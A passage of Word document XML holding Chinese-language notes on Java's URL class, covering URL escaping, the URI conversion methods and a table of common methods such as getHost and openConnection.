      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中定义的转义机制对任何</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组件进行编码或解码。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来电者有责任编码任何需要在调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之前进行转义的字段，并对从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回的任何转义字段进行解码。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此外，由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不具有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转义的知识，因此不能识别同一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的编码或解码形式之间的等同性。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如，两个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57737B7A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0454E58B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  http://foo.com/hello world/ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F6C064" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  http://foo.com/hello%20world </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603F8D53" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="011D908F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将被视为不相等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663F6489" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意：在某些情况下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类确实执行其组件字段的转义。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码和解码的推荐方法是使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">URI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>toURI()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>URI.toURL()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这两个类之间进行转换。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2900CA84" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URLEncoder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URLDecoder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类，但仅适用于与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RFC2396</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中定义的编码方案不同的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表单编码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E65FABA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类的常规使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49508411" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E7597E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3660FE08" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>boolean equals(Object obj)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与其他对象进行比较。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FE48C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String getAuthority()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取此的授权部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533AEC42" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Object getContent()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16868462" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Object getContent(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[] classes)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4191665D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int getDefaultPort()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取与此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的协议的默认端口号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0210D18F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String getFile()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的文件名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A441145" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String getHost()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的主机名（如适用）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0057785D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String getPath()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的路径部分。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B1284E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int getPort()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的端口号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45640BBC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String getProtocol()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的协议名称。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A22F388" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String getQuery()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的查询部分。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E55FC8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String getRef()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取此的锚定（也称为“参考”）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F98380D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String getUserInfo()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>userInfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAB0DA2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int hashCode()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建适合哈希表索引的整数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0636E190" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URLConnection openConnection()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URLConnection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例，表示与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引用的远程对象的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0277FF66" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URLConnection openConnection(Proxy proxy)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>openConnection()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相同，但连接将通过指定的代理进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不支持代理的协议处理程序将忽略代理参数并进行正常连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508D945E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>InputStream openStream()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开与此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并返回一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> InputStream </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，以便从该连接读取。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6281A959" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>boolean sameFile(URL other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比较两个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，不包括片段组件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234AABF4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>static void setURLStreamHandlerFactory(URLStreamHandlerFactory fac)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置应用程序的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URLStreamHandlerFactory </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B36358" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String toExternalForm()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
